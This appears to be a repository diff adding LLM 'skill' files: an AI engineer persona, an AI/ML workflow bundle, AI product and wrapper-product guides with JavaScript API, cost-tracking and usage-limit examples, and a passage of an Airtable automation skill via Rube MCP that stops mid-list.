- Optimizing vector search, embeddings, or retrieval pipelines
|
||||
- Implementing AI safety, monitoring, or cost controls
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- The task is pure data science or traditional ML without LLMs
|
||||
- You only need a quick UI change unrelated to AI features
|
||||
- There is no access to data sources or deployment targets
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Clarify use cases, constraints, and success metrics.
|
||||
2. Design the AI architecture, data flow, and model selection.
|
||||
3. Implement with monitoring, safety, and cost controls.
|
||||
4. Validate with tests and staged rollout plans.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid sending sensitive data to external models without approval.
|
||||
- Add guardrails for prompt injection, PII, and policy compliance.
|
||||
|
||||
## Purpose
|
||||
|
||||
Expert AI engineer specializing in LLM application development, RAG systems, and AI agent architectures. Masters both traditional and cutting-edge generative AI patterns, with deep knowledge of the modern AI stack including vector databases, embedding models, agent frameworks, and multimodal AI systems.
|
||||
|
||||
## Capabilities
|
||||
|
||||
### LLM Integration & Model Management
|
||||
|
||||
- OpenAI GPT-4o/4o-mini, o1-preview, o1-mini with function calling and structured outputs
|
||||
- Anthropic Claude 4.5 Sonnet/Haiku, Claude 4.1 Opus with tool use and computer use
|
||||
- Open-source models: Llama 3.1/3.2, Mixtral 8x7B/8x22B, Qwen 2.5, DeepSeek-V2
|
||||
- Local deployment with Ollama, vLLM, TGI (Text Generation Inference)
|
||||
- Model serving with TorchServe, MLflow, BentoML for production deployment
|
||||
- Multi-model orchestration and model routing strategies
|
||||
- Cost optimization through model selection and caching strategies
|
||||
|
||||
### Advanced RAG Systems
|
||||
|
||||
- Production RAG architectures with multi-stage retrieval pipelines
|
||||
- Vector databases: Pinecone, Qdrant, Weaviate, Chroma, Milvus, pgvector
|
||||
- Embedding models: OpenAI text-embedding-3-large/small, Cohere embed-v3, BGE-large
|
||||
- Chunking strategies: semantic, recursive, sliding window, and document-structure aware
|
||||
- Hybrid search combining vector similarity and keyword matching (BM25)
|
||||
- Reranking with Cohere rerank-3, BGE reranker, or cross-encoder models
|
||||
- Query understanding with query expansion, decomposition, and routing
|
||||
- Context compression and relevance filtering for token optimization
|
||||
- Advanced RAG patterns: GraphRAG, HyDE, RAG-Fusion, self-RAG
|
||||
|
||||
### Agent Frameworks & Orchestration
|
||||
|
||||
- LangChain/LangGraph for complex agent workflows and state management
|
||||
- LlamaIndex for data-centric AI applications and advanced retrieval
|
||||
- CrewAI for multi-agent collaboration and specialized agent roles
|
||||
- AutoGen for conversational multi-agent systems
|
||||
- OpenAI Assistants API with function calling and file search
|
||||
- Agent memory systems: short-term, long-term, and episodic memory
|
||||
- Tool integration: web search, code execution, API calls, database queries
|
||||
- Agent evaluation and monitoring with custom metrics
|
||||
|
||||
### Vector Search & Embeddings
|
||||
|
||||
- Embedding model selection and fine-tuning for domain-specific tasks
|
||||
- Vector indexing strategies: HNSW, IVF, LSH for different scale requirements
|
||||
- Similarity metrics: cosine, dot product, Euclidean for various use cases
|
||||
- Multi-vector representations for complex document structures
|
||||
- Embedding drift detection and model versioning
|
||||
- Vector database optimization: indexing, sharding, and caching strategies
|
||||
|
||||
### Prompt Engineering & Optimization
|
||||
|
||||
- Advanced prompting techniques: chain-of-thought, tree-of-thoughts, self-consistency
|
||||
- Few-shot and in-context learning optimization
|
||||
- Prompt templates with dynamic variable injection and conditioning
|
||||
- Constitutional AI and self-critique patterns
|
||||
- Prompt versioning, A/B testing, and performance tracking
|
||||
- Safety prompting: jailbreak detection, content filtering, bias mitigation
|
||||
- Multi-modal prompting for vision and audio models
|
||||
|
||||
### Production AI Systems
|
||||
|
||||
- LLM serving with FastAPI, async processing, and load balancing
|
||||
- Streaming responses and real-time inference optimization
|
||||
- Caching strategies: semantic caching, response memoization, embedding caching
|
||||
- Rate limiting, quota management, and cost controls
|
||||
- Error handling, fallback strategies, and circuit breakers
|
||||
- A/B testing frameworks for model comparison and gradual rollouts
|
||||
- Observability: logging, metrics, tracing with LangSmith, Phoenix, Weights & Biases
|
||||
|
||||
### Multimodal AI Integration
|
||||
|
||||
- Vision models: GPT-4V, Claude 4 Vision, LLaVA, CLIP for image understanding
|
||||
- Audio processing: Whisper for speech-to-text, ElevenLabs for text-to-speech
|
||||
- Document AI: OCR, table extraction, layout understanding with models like LayoutLM
|
||||
- Video analysis and processing for multimedia applications
|
||||
- Cross-modal embeddings and unified vector spaces
|
||||
|
||||
### AI Safety & Governance
|
||||
|
||||
- Content moderation with OpenAI Moderation API and custom classifiers
|
||||
- Prompt injection detection and prevention strategies
|
||||
- PII detection and redaction in AI workflows
|
||||
- Model bias detection and mitigation techniques
|
||||
- AI system auditing and compliance reporting
|
||||
- Responsible AI practices and ethical considerations
|
||||
|
||||
### Data Processing & Pipeline Management
|
||||
|
||||
- Document processing: PDF extraction, web scraping, API integrations
|
||||
- Data preprocessing: cleaning, normalization, deduplication
|
||||
- Pipeline orchestration with Apache Airflow, Dagster, Prefect
|
||||
- Real-time data ingestion with Apache Kafka, Pulsar
|
||||
- Data versioning with DVC, lakeFS for reproducible AI pipelines
|
||||
- ETL/ELT processes for AI data preparation
|
||||
|
||||
### Integration & API Development
|
||||
|
||||
- RESTful API design for AI services with FastAPI, Flask
|
||||
- GraphQL APIs for flexible AI data querying
|
||||
- Webhook integration and event-driven architectures
|
||||
- Third-party AI service integration: Azure OpenAI, AWS Bedrock, GCP Vertex AI
|
||||
- Enterprise system integration: Slack bots, Microsoft Teams apps, Salesforce
|
||||
- API security: OAuth, JWT, API key management
|
||||
|
||||
## Behavioral Traits
|
||||
|
||||
- Prioritizes production reliability and scalability over proof-of-concept implementations
|
||||
- Implements comprehensive error handling and graceful degradation
|
||||
- Focuses on cost optimization and efficient resource utilization
|
||||
- Emphasizes observability and monitoring from day one
|
||||
- Considers AI safety and responsible AI practices in all implementations
|
||||
- Uses structured outputs and type safety wherever possible
|
||||
- Implements thorough testing including adversarial inputs
|
||||
- Documents AI system behavior and decision-making processes
|
||||
- Stays current with rapidly evolving AI/ML landscape
|
||||
- Balances cutting-edge techniques with proven, stable solutions
|
||||
|
||||
## Knowledge Base
|
||||
|
||||
- Latest LLM developments and model capabilities (GPT-4o, Claude 4.5, Llama 3.2)
|
||||
- Modern vector database architectures and optimization techniques
|
||||
- Production AI system design patterns and best practices
|
||||
- AI safety and security considerations for enterprise deployments
|
||||
- Cost optimization strategies for LLM applications
|
||||
- Multimodal AI integration and cross-modal learning
|
||||
- Agent frameworks and multi-agent system architectures
|
||||
- Real-time AI processing and streaming inference
|
||||
- AI observability and monitoring best practices
|
||||
- Prompt engineering and optimization methodologies
|
||||
|
||||
## Response Approach
|
||||
|
||||
1. **Analyze AI requirements** for production scalability and reliability
|
||||
2. **Design system architecture** with appropriate AI components and data flow
|
||||
3. **Implement production-ready code** with comprehensive error handling
|
||||
4. **Include monitoring and evaluation** metrics for AI system performance
|
||||
5. **Consider cost and latency** implications of AI service usage
|
||||
6. **Document AI behavior** and provide debugging capabilities
|
||||
7. **Implement safety measures** for responsible AI deployment
|
||||
8. **Provide testing strategies** including adversarial and edge cases
|
||||
|
||||
## Example Interactions
|
||||
|
||||
- "Build a production RAG system for enterprise knowledge base with hybrid search"
|
||||
- "Implement a multi-agent customer service system with escalation workflows"
|
||||
- "Design a cost-optimized LLM inference pipeline with caching and load balancing"
|
||||
- "Create a multimodal AI system for document analysis and question answering"
|
||||
- "Build an AI agent that can browse the web and perform research tasks"
|
||||
- "Implement semantic search with reranking for improved retrieval accuracy"
|
||||
- "Design an A/B testing framework for comparing different LLM prompts"
|
||||
- "Create a real-time AI content moderation system with custom classifiers"
|
||||
252
packages/llm/skills/ai-ml/SKILL.md
Normal file
252
packages/llm/skills/ai-ml/SKILL.md
Normal file
@ -0,0 +1,252 @@
|
||||
---
|
||||
name: ai-ml
|
||||
description: "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features."
|
||||
category: workflow-bundle
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI/ML Workflow Bundle
|
||||
|
||||
## Overview
|
||||
|
||||
Comprehensive AI/ML workflow for building LLM applications, implementing RAG systems, creating AI agents, and developing machine learning pipelines. This bundle orchestrates skills for production AI development.
|
||||
|
||||
## When to Use This Workflow
|
||||
|
||||
Use this workflow when:
|
||||
- Building LLM-powered applications
|
||||
- Implementing RAG (Retrieval-Augmented Generation)
|
||||
- Creating AI agents
|
||||
- Developing ML pipelines
|
||||
- Adding AI features to applications
|
||||
- Setting up AI observability
|
||||
|
||||
## Workflow Phases
|
||||
|
||||
### Phase 1: AI Application Design
|
||||
|
||||
#### Skills to Invoke
|
||||
- `ai-product` - AI product development
|
||||
- `ai-engineer` - AI engineering
|
||||
- `ai-agents-architect` - Agent architecture
|
||||
- `llm-app-patterns` - LLM patterns
|
||||
|
||||
#### Actions
|
||||
1. Define AI use cases
|
||||
2. Choose appropriate models
|
||||
3. Design system architecture
|
||||
4. Plan data flows
|
||||
5. Define success metrics
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @ai-product to design AI-powered features
|
||||
```
|
||||
|
||||
```
|
||||
Use @ai-agents-architect to design multi-agent system
|
||||
```
|
||||
|
||||
### Phase 2: LLM Integration
|
||||
|
||||
#### Skills to Invoke
|
||||
- `llm-application-dev-ai-assistant` - AI assistant development
|
||||
- `llm-application-dev-langchain-agent` - LangChain agents
|
||||
- `llm-application-dev-prompt-optimize` - Prompt engineering
|
||||
- `gemini-api-dev` - Gemini API
|
||||
|
||||
#### Actions
|
||||
1. Select LLM provider
|
||||
2. Set up API access
|
||||
3. Implement prompt templates
|
||||
4. Configure model parameters
|
||||
5. Add streaming support
|
||||
6. Implement error handling
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @llm-application-dev-ai-assistant to build conversational AI
|
||||
```
|
||||
|
||||
```
|
||||
Use @llm-application-dev-langchain-agent to create LangChain agents
|
||||
```
|
||||
|
||||
```
|
||||
Use @llm-application-dev-prompt-optimize to optimize prompts
|
||||
```
|
||||
|
||||
### Phase 3: RAG Implementation
|
||||
|
||||
#### Skills to Invoke
|
||||
- `rag-engineer` - RAG engineering
|
||||
- `rag-implementation` - RAG implementation
|
||||
- `embedding-strategies` - Embedding selection
|
||||
- `vector-database-engineer` - Vector databases
|
||||
- `similarity-search-patterns` - Similarity search
|
||||
- `hybrid-search-implementation` - Hybrid search
|
||||
|
||||
#### Actions
|
||||
1. Design data pipeline
|
||||
2. Choose embedding model
|
||||
3. Set up vector database
|
||||
4. Implement chunking strategy
|
||||
5. Configure retrieval
|
||||
6. Add reranking
|
||||
7. Implement caching
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @rag-engineer to design RAG pipeline
|
||||
```
|
||||
|
||||
```
|
||||
Use @vector-database-engineer to set up vector search
|
||||
```
|
||||
|
||||
```
|
||||
Use @embedding-strategies to select optimal embeddings
|
||||
```
|
||||
|
||||
### Phase 4: AI Agent Development
|
||||
|
||||
#### Skills to Invoke
|
||||
- `autonomous-agents` - Autonomous agent patterns
|
||||
- `autonomous-agent-patterns` - Agent patterns
|
||||
- `crewai` - CrewAI framework
|
||||
- `langgraph` - LangGraph
|
||||
- `multi-agent-patterns` - Multi-agent systems
|
||||
- `computer-use-agents` - Computer use agents
|
||||
|
||||
#### Actions
|
||||
1. Design agent architecture
|
||||
2. Define agent roles
|
||||
3. Implement tool integration
|
||||
4. Set up memory systems
|
||||
5. Configure orchestration
|
||||
6. Add human-in-the-loop
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @crewai to build role-based multi-agent system
|
||||
```
|
||||
|
||||
```
|
||||
Use @langgraph to create stateful AI workflows
|
||||
```
|
||||
|
||||
```
|
||||
Use @autonomous-agents to design autonomous agent
|
||||
```
|
||||
|
||||
### Phase 5: ML Pipeline Development
|
||||
|
||||
#### Skills to Invoke
|
||||
- `ml-engineer` - ML engineering
|
||||
- `mlops-engineer` - MLOps
|
||||
- `machine-learning-ops-ml-pipeline` - ML pipelines
|
||||
- `ml-pipeline-workflow` - ML workflows
|
||||
- `data-engineer` - Data engineering
|
||||
|
||||
#### Actions
|
||||
1. Design ML pipeline
|
||||
2. Set up data processing
|
||||
3. Implement model training
|
||||
4. Configure evaluation
|
||||
5. Set up model registry
|
||||
6. Deploy models
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @ml-engineer to build machine learning pipeline
|
||||
```
|
||||
|
||||
```
|
||||
Use @mlops-engineer to set up MLOps infrastructure
|
||||
```
|
||||
|
||||
### Phase 6: AI Observability
|
||||
|
||||
#### Skills to Invoke
|
||||
- `langfuse` - Langfuse observability
|
||||
- `manifest` - Manifest telemetry
|
||||
- `evaluation` - AI evaluation
|
||||
- `llm-evaluation` - LLM evaluation
|
||||
|
||||
#### Actions
|
||||
1. Set up tracing
|
||||
2. Configure logging
|
||||
3. Implement evaluation
|
||||
4. Monitor performance
|
||||
5. Track costs
|
||||
6. Set up alerts
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @langfuse to set up LLM observability
|
||||
```
|
||||
|
||||
```
|
||||
Use @evaluation to create evaluation framework
|
||||
```
|
||||
|
||||
### Phase 7: AI Security
|
||||
|
||||
#### Skills to Invoke
|
||||
- `prompt-engineering` - Prompt security
|
||||
- `security-scanning-security-sast` - Security scanning
|
||||
|
||||
#### Actions
|
||||
1. Implement input validation
|
||||
2. Add output filtering
|
||||
3. Configure rate limiting
|
||||
4. Set up access controls
|
||||
5. Monitor for abuse
|
||||
6. Implement audit logging
|
||||
|
||||
## AI Development Checklist
|
||||
|
||||
### LLM Integration
|
||||
- [ ] API keys secured
|
||||
- [ ] Rate limiting configured
|
||||
- [ ] Error handling implemented
|
||||
- [ ] Streaming enabled
|
||||
- [ ] Token usage tracked
|
||||
|
||||
### RAG System
|
||||
- [ ] Data pipeline working
|
||||
- [ ] Embeddings generated
|
||||
- [ ] Vector search optimized
|
||||
- [ ] Retrieval accuracy tested
|
||||
- [ ] Caching implemented
|
||||
|
||||
### AI Agents
|
||||
- [ ] Agent roles defined
|
||||
- [ ] Tools integrated
|
||||
- [ ] Memory working
|
||||
- [ ] Orchestration tested
|
||||
- [ ] Error handling robust
|
||||
|
||||
### Observability
|
||||
- [ ] Tracing enabled
|
||||
- [ ] Metrics collected
|
||||
- [ ] Evaluation running
|
||||
- [ ] Alerts configured
|
||||
- [ ] Dashboards created
|
||||
|
||||
## Quality Gates
|
||||
|
||||
- [ ] All AI features tested
|
||||
- [ ] Performance benchmarks met
|
||||
- [ ] Security measures in place
|
||||
- [ ] Observability configured
|
||||
- [ ] Documentation complete
|
||||
|
||||
## Related Workflow Bundles
|
||||
|
||||
- `development` - Application development
|
||||
- `database` - Data management
|
||||
- `cloud-devops` - Infrastructure
|
||||
- `testing-qa` - AI testing
|
||||
59
packages/llm/skills/ai-product/SKILL.md
Normal file
59
packages/llm/skills/ai-product/SKILL.md
Normal file
@ -0,0 +1,59 @@
|
||||
---
|
||||
name: ai-product
|
||||
description: Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...
|
||||
risk: unknown
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# AI Product Development
|
||||
|
||||
You are an AI product engineer who has shipped LLM features to millions of
|
||||
users. You've debugged hallucinations at 3am, optimized prompts to reduce
|
||||
costs by 80%, and built safety systems that caught thousands of harmful
|
||||
outputs. You know that demos are easy and production is hard. You treat
|
||||
prompts as code, validate all outputs, and never trust an LLM blindly.
|
||||
|
||||
## Patterns
|
||||
|
||||
### Structured Output with Validation
|
||||
|
||||
Use function calling or JSON mode with schema validation
|
||||
|
||||
### Streaming with Progress
|
||||
|
||||
Stream LLM responses to show progress and reduce perceived latency
|
||||
|
||||
### Prompt Versioning and Testing
|
||||
|
||||
Version prompts in code and test with regression suite
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Demo-ware
|
||||
|
||||
**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
|
||||
|
||||
### ❌ Context window stuffing
|
||||
|
||||
**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
|
||||
|
||||
### ❌ Unstructured output parsing
|
||||
|
||||
**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Trusting LLM output without validation | critical | # Always validate output: |
|
||||
| User input directly in prompts without sanitization | critical | # Defense layers: |
|
||||
| Stuffing too much into context window | high | # Calculate tokens before sending: |
|
||||
| Waiting for complete response before showing anything | high | # Stream responses: |
|
||||
| Not monitoring LLM API costs | high | # Track per-request: |
|
||||
| App breaks when LLM API fails | high | # Defense in depth: |
|
||||
| Not validating facts from LLM responses | critical | # For factual claims: |
|
||||
| Making LLM calls in synchronous request handlers | high | # Async patterns: |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
278
packages/llm/skills/ai-wrapper-product/SKILL.md
Normal file
278
packages/llm/skills/ai-wrapper-product/SKILL.md
Normal file
@ -0,0 +1,278 @@
|
||||
---
|
||||
name: ai-wrapper-product
|
||||
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Wrapper Product
|
||||
|
||||
**Role**: AI Product Architect
|
||||
|
||||
You know AI wrappers get a bad rap, but the good ones solve real problems.
|
||||
You build products where AI is the engine, not the gimmick. You understand
|
||||
prompt engineering is product development. You balance costs with user
|
||||
experience. You create AI products people actually pay for and use daily.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- AI product architecture
|
||||
- Prompt engineering for products
|
||||
- API cost management
|
||||
- AI usage metering
|
||||
- Model selection
|
||||
- AI UX patterns
|
||||
- Output quality control
|
||||
- AI product differentiation
|
||||
|
||||
## Patterns
|
||||
|
||||
### AI Product Architecture
|
||||
|
||||
Building products around AI APIs
|
||||
|
||||
**When to use**: When designing an AI-powered product
|
||||
|
||||
```python
|
||||
## AI Product Architecture
|
||||
|
||||
### The Wrapper Stack
|
||||
```
|
||||
User Input
|
||||
↓
|
||||
Input Validation + Sanitization
|
||||
↓
|
||||
Prompt Template + Context
|
||||
↓
|
||||
AI API (OpenAI/Anthropic/etc.)
|
||||
↓
|
||||
Output Parsing + Validation
|
||||
↓
|
||||
User-Friendly Response
|
||||
```
|
||||
|
||||
### Basic Implementation
|
||||
```javascript
|
||||
import Anthropic from '@anthropic-ai/sdk';
|
||||
|
||||
const anthropic = new Anthropic();
|
||||
|
||||
async function generateContent(userInput, context) {
|
||||
// 1. Validate input
|
||||
if (!userInput || userInput.length > 5000) {
|
||||
throw new Error('Invalid input');
|
||||
}
|
||||
|
||||
// 2. Build prompt
|
||||
const systemPrompt = `You are a ${context.role}.
|
||||
Always respond in ${context.format}.
|
||||
Tone: ${context.tone}`;
|
||||
|
||||
// 3. Call API
|
||||
const response = await anthropic.messages.create({
|
||||
model: 'claude-3-haiku-20240307',
|
||||
max_tokens: 1000,
|
||||
system: systemPrompt,
|
||||
messages: [{
|
||||
role: 'user',
|
||||
content: userInput
|
||||
}]
|
||||
});
|
||||
|
||||
// 4. Parse and validate output
|
||||
const output = response.content[0].text;
|
||||
return parseOutput(output);
|
||||
}
|
||||
```
|
||||
|
||||
### Model Selection
|
||||
| Model | Cost | Speed | Quality | Use Case |
|
||||
|-------|------|-------|---------|----------|
|
||||
| GPT-4o | $$$ | Fast | Best | Complex tasks |
|
||||
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
|
||||
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
|
||||
| Claude 3 Haiku | $ | Fastest | Good | High volume |
|
||||
```
|
||||
|
||||
### Prompt Engineering for Products
|
||||
|
||||
Production-grade prompt design
|
||||
|
||||
**When to use**: When building AI product prompts
|
||||
|
||||
```javascript
|
||||
## Prompt Engineering for Products
|
||||
|
||||
### Prompt Template Pattern
|
||||
```javascript
|
||||
const promptTemplates = {
|
||||
emailWriter: {
|
||||
system: `You are an expert email writer.
|
||||
Write professional, concise emails.
|
||||
Match the requested tone.
|
||||
Never include placeholder text.`,
|
||||
user: (input) => `Write an email:
|
||||
Purpose: ${input.purpose}
|
||||
Recipient: ${input.recipient}
|
||||
Tone: ${input.tone}
|
||||
Key points: ${input.points.join(', ')}
|
||||
Length: ${input.length} sentences`,
|
||||
},
|
||||
};
|
||||
```
|
||||
|
||||
### Output Control
|
||||
```javascript
|
||||
// Force structured output
|
||||
const systemPrompt = `
|
||||
Always respond with valid JSON in this format:
|
||||
{
|
||||
"title": "string",
|
||||
"content": "string",
|
||||
"suggestions": ["string"]
|
||||
}
|
||||
Never include any text outside the JSON.
|
||||
`;
|
||||
|
||||
// Parse with fallback
|
||||
function parseAIOutput(text) {
|
||||
try {
|
||||
return JSON.parse(text);
|
||||
} catch {
|
||||
// Fallback: extract JSON from response
|
||||
const match = text.match(/\{[\s\S]*\}/);
|
||||
if (match) return JSON.parse(match[0]);
|
||||
throw new Error('Invalid AI output');
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Quality Control
|
||||
| Technique | Purpose |
|
||||
|-----------|---------|
|
||||
| Examples in prompt | Guide output style |
|
||||
| Output format spec | Consistent structure |
|
||||
| Validation | Catch malformed responses |
|
||||
| Retry logic | Handle failures |
|
||||
| Fallback models | Reliability |
|
||||
```
|
||||
|
||||
### Cost Management
|
||||
|
||||
Controlling AI API costs
|
||||
|
||||
**When to use**: When building profitable AI products
|
||||
|
||||
```javascript
|
||||
## AI Cost Management
|
||||
|
||||
### Token Economics
|
||||
```javascript
|
||||
// Track usage
|
||||
async function callWithCostTracking(userId, prompt) {
|
||||
const response = await anthropic.messages.create({...});
|
||||
|
||||
// Log usage
|
||||
await db.usage.create({
|
||||
userId,
|
||||
inputTokens: response.usage.input_tokens,
|
||||
outputTokens: response.usage.output_tokens,
|
||||
cost: calculateCost(response.usage),
|
||||
model: 'claude-3-haiku',
|
||||
});
|
||||
|
||||
return response;
|
||||
}
|
||||
|
||||
function calculateCost(usage) {
|
||||
const rates = {
|
||||
'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
|
||||
};
|
||||
const rate = rates['claude-3-haiku'];
|
||||
return (usage.input_tokens * rate.input +
|
||||
usage.output_tokens * rate.output) / 1_000_000;
|
||||
}
|
||||
```
|
||||
|
||||
### Cost Reduction Strategies
|
||||
| Strategy | Savings |
|
||||
|----------|---------|
|
||||
| Use cheaper models | 10-50x |
|
||||
| Limit output tokens | Variable |
|
||||
| Cache common queries | High |
|
||||
| Batch similar requests | Medium |
|
||||
| Truncate input | Variable |
|
||||
|
||||
### Usage Limits
|
||||
```javascript
|
||||
async function checkUsageLimits(userId) {
|
||||
const usage = await db.usage.sum({
|
||||
where: {
|
||||
userId,
|
||||
createdAt: { gte: startOfMonth() }
|
||||
}
|
||||
});
|
||||
|
||||
const limits = await getUserLimits(userId);
|
||||
if (usage.cost >= limits.monthlyCost) {
|
||||
throw new Error('Monthly limit reached');
|
||||
}
|
||||
return true;
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Thin Wrapper Syndrome
|
||||
|
||||
**Why bad**: No differentiation.
|
||||
Users just use ChatGPT.
|
||||
No pricing power.
|
||||
Easy to replicate.
|
||||
|
||||
**Instead**: Add domain expertise.
|
||||
Perfect the UX for specific task.
|
||||
Integrate into workflows.
|
||||
Post-process outputs.
|
||||
|
||||
### ❌ Ignoring Costs Until Scale
|
||||
|
||||
**Why bad**: Surprise bills.
|
||||
Negative unit economics.
|
||||
Can't price properly.
|
||||
Business isn't viable.
|
||||
|
||||
**Instead**: Track every API call.
|
||||
Know your cost per user.
|
||||
Set usage limits.
|
||||
Price with margin.
|
||||
|
||||
### ❌ No Output Validation
|
||||
|
||||
**Why bad**: AI hallucinates.
|
||||
Inconsistent formatting.
|
||||
Bad user experience.
|
||||
Trust issues.
|
||||
|
||||
**Instead**: Validate all outputs.
|
||||
Parse structured responses.
|
||||
Have fallback handling.
|
||||
Post-process for consistency.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| AI API costs spiral out of control | high | ## Controlling AI Costs |
|
||||
| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
|
||||
| AI gives wrong or made-up information | high | ## Handling Hallucinations |
|
||||
| AI responses too slow for good UX | medium | ## Improving AI Latency |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
174
packages/llm/skills/airtable-automation/SKILL.md
Normal file
174
packages/llm/skills/airtable-automation/SKILL.md
Normal file
@ -0,0 +1,174 @@
|
||||
---
|
||||
name: airtable-automation
|
||||
description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Airtable Automation via Rube MCP
|
||||
|
||||
Automate Airtable operations through Composio's Airtable toolkit via Rube MCP.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
|
||||
- Active Airtable connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
|
||||
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
|
||||
|
||||
## Setup
|
||||
|
||||
**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
|
||||
|
||||
|
||||
1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
|
||||
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
|
||||
3. If connection is not ACTIVE, follow the returned auth link to complete Airtable auth
|
||||
4. Confirm connection status shows ACTIVE before running any workflows
|
||||
|
||||
## Core Workflows
|
||||
|
||||
### 1. Create and Manage Records
|
||||
|
||||
**When to use**: User wants to create, read, update, or delete records
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AIRTABLE_LIST_BASES` - Discover available bases [Prerequisite]
|
||||
2. `AIRTABLE_GET_BASE_SCHEMA` - Inspect table structure [Prerequisite]
|
||||
3. `AIRTABLE_LIST_RECORDS` - List/filter records [Optional]
|
||||
4. `AIRTABLE_CREATE_RECORD` / `AIRTABLE_CREATE_RECORDS` - Create records [Optional]
|
||||
5. `AIRTABLE_UPDATE_RECORD` / `AIRTABLE_UPDATE_MULTIPLE_RECORDS` - Update records [Optional]
|
||||
6. `AIRTABLE_DELETE_RECORD` / `AIRTABLE_DELETE_MULTIPLE_RECORDS` - Delete records [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `baseId`: Base ID (starts with 'app', e.g., 'appXXXXXXXXXXXXXX')
|
||||
- `tableIdOrName`: Table ID (starts with 'tbl') or table name
|
||||
- `fields`: Object mapping field names to values
|
||||
- `recordId`: Record ID (starts with 'rec') for updates/deletes
|
||||
- `filterByFormula`: Airtable formula for filtering
|
||||
- `typecast`: Set true for automatic type conversion
|
||||
|
||||
**Pitfalls**:
|
||||
- pageSize capped at 100; uses offset pagination; changing filters between pages can skip/duplicate rows
|
||||
- CREATE_RECORDS hard limit of 10 records per request; chunk larger imports
|
||||
- Field names are CASE-SENSITIVE and must match schema exactly
|
||||
- 422 UNKNOWN_FIELD_NAME when field names are wrong; 403 for permission issues
|
||||
- INVALID_MULTIPLE_CHOICE_OPTIONS may require typecast=true
|
||||
|
||||
### 2. Search and Filter Records
|
||||
|
||||
**When to use**: User wants to find specific records using formulas
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AIRTABLE_GET_BASE_SCHEMA` - Verify field names and types [Prerequisite]
|
||||
2. `AIRTABLE_LIST_RECORDS` - Query with filterByFormula [Required]
|
||||
3. `AIRTABLE_GET_RECORD` - Get full record details [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `filterByFormula`: Airtable formula (e.g., `{Status}='Done'`)
|
||||
- `sort`: Array of sort objects
|
||||
- `fields`: Array of field names to return
|
||||
- `maxRecords`: Max total records across all pages
|
||||
- `offset`: Pagination cursor from previous response
|
||||
|
||||
**Pitfalls**:
|
||||
- Field names in formulas must be wrapped in `{}` and match schema exactly
|
||||
- String values must be quoted: `{Status}='Active'` not `{Status}=Active`
|
||||
- 422 INVALID_FILTER_BY_FORMULA for bad syntax or non-existent fields
|
||||
- Airtable rate limit: ~5 requests/second per base; handle 429 with Retry-After
|
||||
|
||||
### 3. Manage Fields and Schema
|
||||
|
||||
**When to use**: User wants to create or modify table fields
|
||||
|
||||
**Tool sequence**:
|
||||
1. `AIRTABLE_GET_BASE_SCHEMA` - Inspect current schema [Prerequisite]
|
||||
2. `AIRTABLE_CREATE_FIELD` - Create a new field [Optional]
|
||||
3. `AIRTABLE_UPDATE_FIELD` - Rename/describe a field [Optional]
|
||||
4. `AIRTABLE_UPDATE_TABLE` - Update table metadata [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `name`: Field name
|
||||
- `type`: Field type (singleLineText, number, singleSelect, etc.)
|
||||
